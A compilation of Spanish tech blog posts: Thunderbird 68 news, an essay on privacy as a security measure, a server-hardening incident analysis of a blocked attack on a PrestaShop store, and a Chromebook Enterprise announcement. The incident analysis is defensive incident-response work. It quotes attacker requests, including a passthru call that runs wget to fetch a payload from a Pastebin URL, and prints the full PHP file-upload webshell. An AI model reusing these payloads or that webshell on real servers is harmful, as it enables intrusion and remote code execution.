  • Nuevo mensaje para evitar que instalemos una versión anterior.
  • Calendario: los datos de la hora de la zona pueden ahora incluir cambios pasados y futuros.
  • Chat: se puede seleccionar un idioma individual para corregir la ortografía por conversación.
  • Lista de novedades completa en este enlace.
En el momento de escribir este artículo y como pasa con Firefox, Thunderbird 68 ya está disponible para Windows, macOS y Linux desde su página de descargas o haciendo clic aquí. Lo que descargaremos los usuarios de Linux serán los binarios y para ejecutar el cliente de correo de Mozilla tenemos que ejecutar el archivo “thunderbird”. En los próximos días, Thunderbird 68 aparecerá en los repositorios oficiales de la mayoría de distribuciones Linux.
Bild/Foto
Artículo relacionado:
4 alternativas ligeras a Mozilla Thunderbird

https://www.linuxadictos.com/thunderbird-68-llega-con-pequenos-retoques-en-la-interfaz-y-muchos-cambios.html

 

Conservar la privacidad como medida de seguridad


Hoy traemos una colaboración de Luis Amigo. Él se define de la siguiente manera: «Con raíces sólidamente enterradas en el mundo Unix, me gusta definirme como estudiante en tránsito, gestor de proyectos, programador, devops… aún faltan muchas cosas por aprender. Cuando no estoy trabajando o estudiando disfruto leyendo, escribiendo o compartiendo artículos.»
Desde estas líneas agradecemos a Luis su participación.

Muchas compañías son conscientes de que la información es uno de sus principales activos y por ello invierten cada vez más en protocolos y medidas de seguridad. Los expertos en seguridad saben que el propio usuario es uno de los principales vectores de riesgo y por eso establecen medidas para evitar estos problemas en el entorno controlado de una oficina. Estas políticas entran en colisión directa con paradigmas cambiantes como el trabajo remoto o la posibilidad de llevar dispositivos personales a la oficina (BYOD). Aunque los expertos en seguridad establecen medidas de control para este tipo de casos, es importante que se fijen en otro problema que pasa desapercibido: la cantidad de datos personales que esos trabajadores van dejando en Internet y que pueden ser utilizados para generar vectores de ataque sobre sus compañías.

La ausencia de privacidad es un problema de seguridad

Durante años se ha ignorado el problema de seguridad que viene de la mano de la falta de privacidad. Los usuarios han ido realizando registros en multitud de emplazamientos, dejando respuestas a preguntas secretas, dejando información sobre sus hábitos, sobre su vida, sobre su infancia… sin ser conscientes de los problemas de seguridad derivados de esos problemas.

A lo largo de estos años se han producido pérdidas de información en diversos sitios web (que hayamos conocido) que han dejado expuestas cuentas de correo, contraseñas, respuestas secretas… que pueden ser utilizados para acceder a otras cuentas de los mismos usuarios, pero eso es solo la punta del iceberg.

Esos mismos usuarios han ido dejando huellas de su actividad en Internet (y fuera de Internet) durante años, en manos de compañías como Google, Facebook o Twitter; datos que pueden ser utilizados por terceros para lograr acceso a sus cuentas, o en los peores casos incluso para chantaje de altos ejecutivos.

Con los nuevos dispositivos, Google o Facebook pueden llevar una relación de lugares visitados y relacionarlos con información personal, de esta forma, alguien que pudiera acceder al historial del usuario podría identificar su presencia en lugares inadecuados o incluso compras inadecuadas y utilizarlos para realizar chantaje.

Sea cual sea el uso que más nos preocupe, o incluso si no nos preocupa ninguno de ellos, es importante comenzar a educar a los usuarios, sobre todo en el ámbito de la empresa, ya que personas que actualmente pueden considerar que su información no es importante no saben en qué situación van a estar en unos años.

Cómo se produce la captación de datos

Hay multitud de compañías que realizan este tipo de captación de datos, pero la forma en la que captan los datos no varía mucho de unas a otras, así que nos centraremos en la más relevante: Google.

Google tiene todo un ecosistema de servicios gratuitos cuyo principal objetivo es atraer a los usuarios a un entorno en el que pueda captar información y esa captación de información se hace mediante cookies de rastreo.

Las cookies son pequeñas piezas de información que se guardan en el navegador del usuario y a las que solo se puede acceder desde el mismo dominio que la creó. En este momento es cuando la oferta de aplicaciones y servicios gratuitos cobra valor, ya sea utilizando el buscador, o el correo o los mapas, Google asigna una ID de rastreo única a cada usuario (aunque no tenga una cuenta creada) y la guarda en una cookie. Posteriormente, cuando el usuario navega por Internet, visita páginas que incluyen código de Google (Analytics, Ads, Captcha, Mapas, …) este código se carga desde el mismo dominio raíz que creó la cookie de rastreo, por lo que puede acceder a la cookie de rastreo y añadir el ID único del usuario a todas las peticiones. De esta manera, Google puede relacionar al usuario con visitas a determinados sitios web, con determinadas búsquedas, con el contenido de sus mensajes de correo, con sus búsquedas en mapas o planes de viaje, información de vuelos… y todo sin contar con la ingente cantidad de datos (posición, actividad, registros de llamadas, …) que obtiene de los teléfonos móviles (aunque no sean Android).

Qué uso se da a esos datos

De acuerdo con Google, esos datos se usan de forma anonimizada para mejorar la experiencia de usuario y las aplicaciones. Aún creyendo lo que dice Google, el problema es que esos datos son tremendamente fáciles de desanonimizar y relacionar con el usuario real, bien sea a través de la cuenta de correo o a través de sus ubicaciones (la ubicación de la casa) o de la cuenta en el teléfono móvil o incluso el propio número de móvil.

El principal problema de esos datos es su persistencia y la dejación que hacemos al entregarlos ya que una vez entregados los datos no hay nada que podamos hacer para garantizar su seguridad, más allá de emprender un viaje a las solicitudes de derecho al olvido y pensar que ese olvido será total. En este punto no nos queda más remedio que confiar en las políticas de seguridad de Google y en la honradez de sus empleados y por eso es necesario educar a los usuarios para reducir la posibilidad de llegar hasta este punto.

Qué puede hacer un usuario para evitar esto

Básicamente lo único que puede hacer un usuario es dejar de dar información de manera gratuita. Hay muchas pequeñas acciones que reducirán la información que entrega a estas compañías, en algunos casos le será más fácil seguir unos consejos que otros pero cada consejo que se siga mejorará su privacidad y es decisión del usuario equilibrar la privacidad con la funcionalidad, pero siempre siendo consciente de los datos que está entregando.

En esta línea, lo primero que se puede hacer es empezar a utilizar navegación privada, navegadores orientados a la privacidad o extensiones para bloquear cookies de rastreo. Es importante saber que el modo incógnito de Google Chrome no entra en esta categoría pues se ha demostrado que continúa enviando información a los servidores de Google.

Todo lo anterior falla si utilizamos nuestra cuenta de Google en algún servicio. Si ese es el caso, deberíamos cerrar el navegador antes de continuar con nuestra actividad.

De este modo, cada vez que abramos el navegador seremos un usuario distinto de cara a los rastreadores y no podrán vincular la información. Si utilizamos además servicios alternativos a su buscador entonces no tendremos un punto de entrada en el que nos capten.

Adicionalmente hay que ser conscientes de que los servicios gratuitos en general no son proporcionados por organizaciones sin ánimo de lucro y que siempre hay un objetivo económico en dichas aplicaciones, por lo que siempre que sea posible es recomendable evitar su uso, sobre todo en entornos corporativos.

No todo el uso de datos se obtiene por parte de Google o similares. Nuestros operadores de telecomunicaciones y algunos gobiernos obtienen información de nuestras comunicaciones. En ese caso lo mejor que podemos hacer es utilizar una VPN para que el contenido de nuestras comunicaciones no sea accesible.

Conclusiones

Estamos ante un nuevo paradigma de seguridad personal y corporativa, el problema de la captación excesiva de datos no ha hecho más que comenzar y, desgraciadamente, no podemos prever qué va a pasar en uso años, por lo que es el momento de salvaguardar algunos datos personales, como por ejemplo datos biométricos antes de que descubramos que existe un problema con ellas. Las empresas necesitan comenzar a invertir en la concienciación de sus usuarios, sobre todo de aquellos con acceso a datos confidenciales o a datos sensibles de la compañía.
  • Imagen utilizada de https://pixabay.com/photos/door-open-wooden-the-next-doorway-1089638/
    La entrada Conservar la privacidad como medida de seguridad aparece primero en Security Art Work.
  •  
    Me parece que se queda demasiado corto. Aparte de lo que dice, hay muchas formas de rastreo que son casi imposibles de evitar sin extensiones o cambios en el navegador, como Almacenamiento DOM, Canvas fingerprinting, y todo lo que pueden recoger del navegador y ordenador al usar javascript (por eso lo evito): batería, cpu, resolución de pantalla, id del navegador, qué extensiones usa, y un largo etcétera. De ahí que Tor Browser ponga siempre esto en el usuario como 1 igual.

     

    La importancia del bastionado de servidores – Parte 3. El incidente


    Hoy publicamos el tercero, y último, de los artículos cortesía de Jorge García sobre la importancia del bastionado de servidores. Aquí tenéis todos los artículos de la serie [1] [2] [3]

    Con la tienda ya publicada y en servicio, llega el momento de poner en práctica todas las cosas que hemos mencionado arriba: mantener una correcta vigilancia, mantener la aplicación y sistemas actualizados, etc.

    Personalmente reviso casi todas las mañanas las alertas de Suricata de todos los servicios que tengo publicados. Filtro aquellas que no considero relevantes y me centro en las que sí que lo son. Normalmente se tratan de intentos de intrusión que han sido bloqueados o intentos de explotar una tecnología que no está desplegada en el servidor. Esto ocurre a menudo cuando, por ejemplo, se publica una vulnerabilidad de WordPress y los atacantes intentan explotarla en cualquier CMS accesible desde Internet, aunque no disponga de la versión vulnerable o ni siquiera sea del mismo fabricante del que se haya publicado la vulnerabilidad.

    Un día, tras hacerme el café mañanero, llama mi atención esta firma:
    212.237.21.72 ET WEB_SERVER PHP tags in HTTP POST
    La firma pertenece a la categoría WEB_SERVER del set de reglas de Emerging Threats que tengo configurado. Aunque muchas firmas tienen un título bastante explicativo de lo que puede estar sucediendo, lo primero que hago siempre es buscar la referencia oficial de ET que me indique qué está pasando si salta esa firma:

    “El ataque WEB_SERVER PHP tags in HTTP POST es un método de envenenamiento de código HTTP a través de inyección PHP. El atacante está intentando insertar código PHP en el HTTP request body, tratando de que el servidor ejecute dicho código.”

    Esto disparó mis alarmas. Lo primero que hago es consultar rápidamente si hay alguna vulnerabilidad nueva en Prestashop que afecte a la versión instalada pero no parece que haya ninguna.

    Lo siguiente que hago es entrar en la máquina por SSH y revisar los logs del servidor web (tanto el de Apache como el de Mod Security), buscando la IP 212.237.21.72 en ellos. Encuentro rápidamente que hay ocurrencias en el log de Mod Security, donde nos arroja más información de distintas peticiones sospechosas que ha interceptado. Antes de pasar a analizar las peticiones, cuyos extractos se muestran más abajo de forma resumida para facilitar la comprensión lectora, repasamos primero el formato del Audit Log de Mod Security.

    Formato del Audit Log de Mod Security


    Mod Security dispone de un fichero, denominado por defecto modsec_audit.log, que almacena todas las peticiones que son relevantes para Mod Security -aquéllas que aumentan la puntuación de anomalía o en las que Mod Security realiza alguna acción-. Este fichero de log tiene un formato específico, donde para cada petición se analizan diversas partes:



    En el caso que nos ocupa, la sección A es el Audit Log Header. Aquí se muestra el timestamp de la petición, las direcciones IP y puertos origen y destino y el ID de identificación única.

    La sección B muestra las cabeceras de la petición (request line and request headers). Aquí se muestran los datos de la petición que solicita el cliente, generalmente encontramos el método (GET/POST…), el hostname al que se ha solicitado la petición (dominio URL), el recurso solicitado (URI) y el User-Agent de la petición, entre otras cosas.

    La sección C contiene el propio cuerpo de la petición (request body).

    La sección F contiene la cabecera de la respuesta enviada por el servidor al cliente (response header). Aquí se observa lo que el servidor ha respondido al cliente, pudiendo contener información valiosa en el código de estado HTTP (200 OK, 403 Forbidden, 404 Not Found).

    La sección H es el Audit Log Trailer y contiene la información más importante acerca de la petición, indicando qué regla se ha disparado y por qué. Aquí se indica también el estado del motor de Mod Security, que al igual que ocurre con SELInux, puede estar en modo activo -ENABLED- lo que implica que las peticiones serán detectadas y bloqueadas, puede estar en modo detección -DETECTION_ONLY- donde las peticiones serán detectadas pero no se bloquearán (útil para troubleshooting) o puede estar desactivado.

    La sección J incluye detalles de los ficheros subidos por el cliente.

    Una vez familiarizados con el formato de Mod Security, pasamos a analizar las peticiones registradas relativas a este incidente.

    Petición 0c54696d


    La primera petición que realiza la IP que estamos buscando se produce a las 21:02:02 según el timestamp de la sección A del log de Mod Security:
    --0c54696d-A--
    [07/May/2019:21:02:02 +0200]
    (…)

    El equipo atacante realiza entonces una petición POST a un recurso denominado uploadimage.php. Compruebo además que la aplicación que está siendo atacada es la tienda online de mi compañera, dado que en esta sección también se nos informa del dominio atacado. En estos momentos empiezo a tener calor. Por el nombre del recurso que solicita la petición ya nos podemos hacer una idea de que se pretende utilizar el script PHP de subida de recursos de alguno de los módulos de Prestashop para subir hacer llegar el malware al servidor:
    --0c54696d-B—
    POST /modules/columnadverts/uploadimage.php HTTP/1.1
    Host: XXXXXX.es
    (…)
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
    (…)

    Esta petición también nos proporciona un primer fingerprint del atacante, del cual ya conocemos la IP y el user-agent desde el que está lanzando el ataque.

    La respuesta de nuestro servidor web la encontramos en la sección F:
    --0c54696d-F--
    HTTP/1.1 403 Forbidden
    X-Frame-Options: SAMEORIGIN
    (…)

    Aquí es importante notar que el recurso solicitado /modules/columnadverts/uploadimage.php no existe en el servidor. De hecho, si intentamos acceder al recurso desde un navegador podemos comprobarlo empíricamente:



    Normalmente cuando se solicita un recurso inexistente en un servidor web, éste devuelve el código HTTP 404 Not Found. El hecho de que nuestro servidor responda con el código 403 Forbidden nos puede indicar que Mod Security ha intervenido bloqueando un intento de explotación. La sección H del mensaje de Mod Security nos aporta casi toda la información importante del incidente. También nos indica el fichero de reglas y el ID de la regla que ha generado el bloqueo:
    --0c54696d-H--
    Message: Warning. Pattern match ".*\\.(?:php\\d*|phtml)\\.*$" at FILES:userfile.
    (…)
    [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"]
    [line "111"]
    [id "933110"]
    (…)

    Mod Security nos informa cuál es el fichero de reglas que incluye la que ha saltado (REQUEST-933-APPLICATION-ATTACK-PHP.conf), y la línea y el ID de la regla en concreto. Compruebo que la regla a la que corresponde dicho ID hace referencia a:
    Blocks file uploads with filenames ending in PHP related extensions. Many applications contain Unrestricted File Upload vulnerabilities.
    Attackers may use such a vulnerability to achieve remote code execution by uploading a .php file. If the upload storage location is predictable and not adequately protected, the attacker may then request the uploaded .php file and have the code within it executed on the server.

    El mensaje de Mod Security también nos aclara el tipo de ataque que se está llevando a cabo (el motivo por el cual se ha intervenido la petición) y el fichero que se ha intentado subir:
    [msg "PHP Injection Attack: PHP Script File Upload Found"]
    (…)
    [data "Matched Data: holapresme_63025.php found within FILES:userfile: holapresme_63025.php"]

    Con esta información ya podemos saber que el atacante está intentando llevar a cabo la subida de código PHP mediante el script de subida uploadimage.php -en nuestro caso inexistente- y conseguir de esta forma subir el fichero holapresme_63025.php conteniendo presumiblemente código PHP -asumido por la extensión del fichero, aunque verificado más adelante-. A continuación, Mod Security establece la severidad -especialmente útil para gestión mediante aplicaciones externas como OSSEC-, la versión del set de reglas en uso y las etiquetas asociadas al ataque:
    [severity "CRITICAL"]
    [ver "OWASP_CRS/3.1.0"]
    [tag "application-multi"]
    [tag "language-php"]
    [tag "platform-multi"]
    [tag "attack-injection-php"]
    [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"]
    [tag "OWASP_TOP_10/A1"]

    Acto seguido Mod Security nos indica la operación que ha llevado a cabo (bloqueo), donde especifica el motivo (la puntuación de anomalía ha llegado al máximo):
    Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.
    [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"]
    [line "93"]
    [id "949110"]
    [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"]

    Mod Security también nos detalla el proceso de correlación que ha seguido hasta alcanzar dicho máximo en la puntuación de anomalía para esta petición. En este caso, al detectar un ataque bastante evidente de subida de código PHP, le otorga al ataque una puntuación de 5 sobre 5 en el flag PHPI (inyección PHP), lo que finaliza la correlación de eventos para esta petición al haber alcanzado el máximo permitido:
    Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"]
    [line "86"]
    [id "980130"]
    [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Script File Upload Found; individual paranoia level scores: 5, 0, 0, 0"]
    [tag "event-correlation"]

    También se nos proporciona un resumen de la petición afectada, donde se especifica el dominio de la URL atacada, el recurso solicitado, el identificador único de la petición, la acción tomada y el estado del motor de Mod Security para esta petición (si está habilitado y bloqueando o si se encuentra habilitado pero sólo en modo detección).
    [hostname "XXXXXX.es"]
    [uri "/modules/columnadverts/uploadimage.php"]
    [unique_id "XNHWKucVoYfdPAN45iju7QAAAAE"]
    Action: Intercepted (phase 2)
    Stopwatch: 1557255722267665 63609 (- - -)
    Stopwatch2: 1557255722267665 63609; combined=1749, p1=649, p2=927, p3=0, p4=0, p5=173, sr=191, sw=0, l=0, gc=0
    Response-Body-Transformed: Dechunked
    Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Engine-Mode: "ENABLED"

    Primeras conclusiones


    Llegados a este punto, es importante darse cuenta de que en ningún momento el atacante ha accedido al fichero uploadimage.php de Prestashop, no porque no exista -que no existe-, sino porque Mod Security ha intervenido la petición ANTES de que ésta alcance la aplicación web. Ésa es la fortaleza de un cortafuegos de aplicación. En este caso la aplicación no sería vulnerable porque el fichero que se está intentando utilizar para subir el código PHP no existe en nuestra instalación (depende del módulo columnadverts que no está instalado), pero en cualquier caso, suponiendo que existiera y fuera vulnerable, Mod Security lo hubiera impedido. Mod Security es absolutamente imprescindible en este tipo de aplicaciones.

    Continuamos el análisis


    No obstante, continuando con la búsqueda de la IP maliciosa en los logs del servidor, encontramos que la misma IP realiza otras peticiones similares a la petición analizada (0c54696d), siempre tratando de localizar diversos ficheros PHP en nuestro servidor que le permitan realizar la subida del fichero malicioso holapresme_603025.php. Reviso todas las peticiones implicadas y observo que Mod Security realiza las mismas operaciones de análisis y bloqueo que ya hemos visto en el análisis anterior:



    Un dato a tener en cuenta es que a partir de la segunda petición en adelante observo que todas ellas comparten la misma cookie de sesión, señalada en la sección B del Audit Log de Mod Security:
    Cookie: PHPSESSID=bfe950386980a35030742de3335aef1e
    Esto, junto con los timestamps de cada petición, nos permite correlar sin problema que se trata de un mismo atacante.

    Petición 83db6b4b


    La novena petición llamó mi atención porque es distinta de las ocho anteriores. En este caso, el atacante, en lugar de tratar de introducir el código malicioso utilizando una herramienta de subida de ficheros del propio CMS, lo que pretende es que el propio CMS descargue desde Internet el código PHP y lo almacene en fichero HolaPresME_63025.php. Para conseguirlo, intenta utilizar la función passthru de PHP, que permite a PHP ejecutar un programa externo en el servidor y devolver el resultado en bruto. Atentos.
    --83db6b4b-A--
    [07/May/2019:21:02:23 +0200] XNHWP-GF38@VJOWEuDIlgAAAAAA 212.237.21.72 62398 192.168.3.3 80
    Apenas han pasado 20 segundos desde la primera de las peticiones, lo que me hace ver que sin duda se trata de un exploit automatizado.
    --83db6b4b-B--
    GET /modules/bamegamenu/ajax_phpcode.php?code=passthru(%22wget%20https://pastebin.com/raw/d1xFC0AK%20-O%20HolaPresME_63025.php%22); HTTP/1.1
    Host: XXXXXX.es
    (…)

    En la propia petición encontramos el código que el atacante quiere ejecutar en nuestro servidor (que analizamos en la siguiente sección):
    wget https://pastebin.com/raw/d1xFC0AK -O HolaPresME_63025.php
    Además, también encontramos información del User-Agent y de la cookie de sesión, que en ambos casos coincide con todas las peticiones anteriores:
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
    Cookie: PHPSESSID=bfe950386980a35030742de3335aef1e

    De igual manera que en las peticiones anteriores, Mod Security intercepta la petición y la bloquea, enviando un 403 Forbidden de vuelta:
    --83db6b4b-F--
    HTTP/1.1 403 Forbidden
    X-Frame-Options: SAMEORIGIN

    En este caso, Mod Security bloquea la petición por la llamada de alto riesgo a la función passthru de PHP, considerada una práctica insegura según podemos extraer de la sección H:
    --83db6b4b-H--
    (…)
    [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"]
    [line "357"]
    [id "933160"]
    [msg "PHP Injection Attack: High-Risk PHP Function Call Found"]
    [data "Matched Data: passthru(\x22wget https://pastebin.com/raw/d1xFC0AK -O HolaPresME_63025.php\x22) found within ARGS:code: passthru(\x22wget https://pastebin.com/raw/d1xFC0AK -O HolaPresME_63025.php\x22);"]

    El resto del análisis de la petición lo omito por ser similar al resto de peticiones.

    Análisis del código malicioso


    Dado que en la petición anterior la propia URL trata de descargar el código malicioso desde Pastebin -mediante wget-, podemos acceder manualmente a dicha URL desde un entorno seguro y descargarnos el fichero para iniciar su análisis:
    https://pastebin.com/raw/d1xFC0AK
    Si formateamos el texto para facilitar su comprensión:
    <?php
    echo 'Yacine_Mohamed'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
    Echo '
    <center>
    <form method="post" target="_self" enctype="multipart/form-data">
    <input type="file" size="20" name="uploads" />
    <input type="submit" value="upload" />
    </form>
    </center>
    </td>
    </tr>
    </table>
    <br>';
    if (!empty ($_FILES['uploads']))
    {move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');
    </script><b>Uploaded !!!</b>
    <br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
    ?>
    Este código PHP proporciona un formulario de subida de ficheros al servidor web. Podemos intuir que el propósito del atacante es crear un fichero PHP temporal (HolaPresME_63025.php) que habilite la subida de ficheros para poder hacer llegar el malware al servidor. Bajo ningún concepto se debe ejecutar código potencialmente malicioso en el servidor, incluso aunque creamos que el código es inofensivo. Llama la atención que el código es bastante autodescriptivo, incluyendo el propio nombre de las funciones o variables empleadas.

    También me llama la atención la inclusión del nombre/cadena de texto Yacine Mohamed al comienzo del código, esto puede sernos de utilidad.

    Llegados a este punto, vemos que el fichero HolaPresME_63025.php no se ha podido subir al servidor a través del propio CMS ni se ha podido desargar el código alojado en Pastebin, ya que en ambos casos Mod Security lo ha impedido. Desconocemos, por tanto, lo que el atacante pretendía subir al servidor (nada bueno, esto está claro).

    Buscando información sobre la vulnerabilidad


    Tras buscar información relevente en Internet, podemos ver que la vulnerabilidad que el atacante está intentando explotar está asociada al tema Warehouse de Prestashop. Además de que es una vulnerabilidad antigua, la tienda de mi compañera no tiene instalado ese tema, por lo que podemos concluir que la instancia no es vulnerable (los módulos utilizados por el tema Warehouse tampoco están instalados por otro tema). La empresa que desarrolla y comercializa el tema publicó una actualización de seguridad en 2016 para corregir la vulnerabilidad, la cual no tiene un CVE asociado, o al menos no he conseguido encontrarlo.



    Los módulos afectados son los que hemos detectado en las peticiones analizadas que el atacante intentaba explotar. Todos los módulos vulnerables disponen de un fichero llamado uploadimage.php, upload.php o similar el cual permite la subida de un fichero y lo mueve a otro directorio. La vulnerabilidad reside en que la subida no pasa por la autenticación de Prestashop para comprobar si el usuario que lo está subiendo está logueado y tiene permiso para hacerlo, sino que permite la subida anónima directamente llamando al fichero.

    Analizando la IP


    Una vez aislada la IP y estando seguros de que es maliciosa, debemos bloquearla en el firewall perimetral para estar seguros de que no vuelve a atacarnos.

    Habiendo analizado todas las ocurrencias de la IP atacante en los logs del sistema, vamos ahora a tratar de buscar información acerca de dicha IP (212.237.21.72) para tratar de alumbrar si puede tratarse de una campaña masiva (a priori complicado al tratarse de una vulnerabilidad antigua) o bien si puede ser una prueba aislada (o incluso algún alumno de Enigma aprendiendo!!).

    Al hacer una búsqueda de la IP en AbuseIPDB nos revela que dicha IP estaba participando en ataques justo el día anterior a nuestra detección, aunque en ese momento sólo tenía un reporte:



    La IP pertenece al proveedor de hosting Aruba, por lo que es posible que se trate de un VPS contratado para fines maliciosos. El datacenter al que pertenece esta IP realiza su salida a Internet desde Italia. No dispongo de datos en la aplicación de análisis de visitas web Matomo para poder complementar la información, ya que la tienda online de mi compañera aún no estaba integrada con Matomo en la fecha en que ocurrió el incidente, pero hubiera sido valioso poder acotar las visitas desde Italia en el rango horario del ataque, con el fin de obtener información adicional tomando como parámetro la cookie de sesión mencionada en el análisis de las peticiones. Realizando búsquedas adicionales en Virustotal y sitios web similares no obtengo resultados interesantes.

    Una opción siempre recomendable es notificar el incidente a la dirección de abuse correspondiente al dominio al que pertenece la IP atacante (que podemos consultar con WHOIS), en este caso abuse@staff.aruba.it.


    Conclusiones finales


    Podemos concluir que una IP italiana de un VPS de Aruba ha intentado, sin éxito, introducir código malicioso en nuestro servidor aprovechándose de una vulnerabilidad del tema Warehouse de Prestashop, que permitiría al atacante ejecutar código arbitrario explotando una subida no autenticada a través de PHP.

    Aunque el servidor no era vulnerable, Mod Security ha garantizado la seguridad impidiendo que las peticiones sospechosas alcanzasen la aplicación, incluso aunque ésta hubiera sido vulnerable. En el caso de que Mod Security no hubiera estado activo y la aplicación fuera vulnerable, aún sería probable que SELinux hubiera impedido la escritura del fichero al tratarse de una operación no-estándar

    La entrada La importancia del bastionado de servidores – Parte 3. El incidente aparece primero en Security Art Work.

     

    Google anuncia los primeros portátiles Chromebook Enterprise




    Muchos vaticinan que los Chromebooks son los ordenadores del futuro, no solo a nivel de computación doméstica, sino también en empresas. Aprovechando este posible filón, Google puso en marcha en 2017 un servicio llamado Chrome Enterprise.

    Chrome Enterprise tiene un precio de 50 dólares al año por cada Chromebook gestionado. Frente a lo que tienen a disposición los usuarios comunes, este servicio ofrece a los usuarios de Chromebooks en empresas características avanzadas de seguridad y gestión de flotas de ordenadores con Chrome OS. Pero el gigante de Mountain View pretende ir más allá, por lo que ha añadido nuevas características a través de las últimas actualizaciones de Chrome Enterprise para aumentar el atractivo de Chrome OS en las empresas, encontrándose ahora una consola de Administración de Google más rápida y gestión de entornos Linux.

    Google cuenta que la interfaz de la renovada consola de administración ha sido reprogramada en buena medida y rediseñada siguiendo los principios de Material Design, por lo que a partir de ahora según la propia compañía debería funcionar hasta 10 veces más rápido. Sobre su funcionamiento, básicamente permite a las empresas manejar diversos Chromebooks desde un único lugar. Además, el hecho de soportar aplicaciones de Linux, entre ellas el IDE Android Studio, aumenta el potencial de los Chromebooks en los entornos corporativos.

    Chrome Enterprise puede ser contratado para hacerlo funcionar sobre cualquier Chromebook, teniendo una frecuencia por defecto de actualizaciones de unas seis semanas, si bien los administradores TI pueden determinar un periodo más apropiado para su organización. Sin embargo, la intención es que los dispositivos Chromebook Enterprise, orientados al mercado corporativo, ofrezcan un hardware confiable para las empresas y acceso al servicio que nos ocupa desde manera predeterminada.

    Aparte de las últimas actualizaciones de Chrome Enterprise, Google ha anunciado los primeros modelos Chromebook Enteprise: Dell Latitude 5300 2-in-1 y Dell Latitude 5400, con pantallas de 13 y 14 pulgadas respectivamente. Estos portátiles destacan por incluir una seguridad multicapa gracias a Chrome Enterprise, la cual les otorga una mejor protección frente a las amenazas y permite a los administradores TI monitorizar y bloquear dispositivos mientras controlan las actualizaciones; soporte disponible en 50 países mediante LTE junto a Dell ProSupport, que ofrece servicio 24 horas los 7 días de la semana; diseño escalable, alto rendimiento y gran autonomía; además de aplicaciones en la nube mediante Drive Enterprise y revendiendo las soluciones de Google.

    Ambos modelos incluyen gestión de endpoints unificada a través de Dell Technologies’ Unified Workspace y permiten seleccionar entre procesadores Intel Core i5 e Intel Core i7 junto a hasta 32GB de RAM, hasta 1TB de almacenamiento vía SSD NVMe PCI-E, incluyendo también opciones de LTE y ampliación mediante USB Type-C. Los precios base son de 819 dólares para el Dell Latitude 5300 y 699 dólares para el Dell Latitude 5400.
    https://www.muylinux.com/2019/08/28/google-anuncia-primeros-chromebook-enterprise/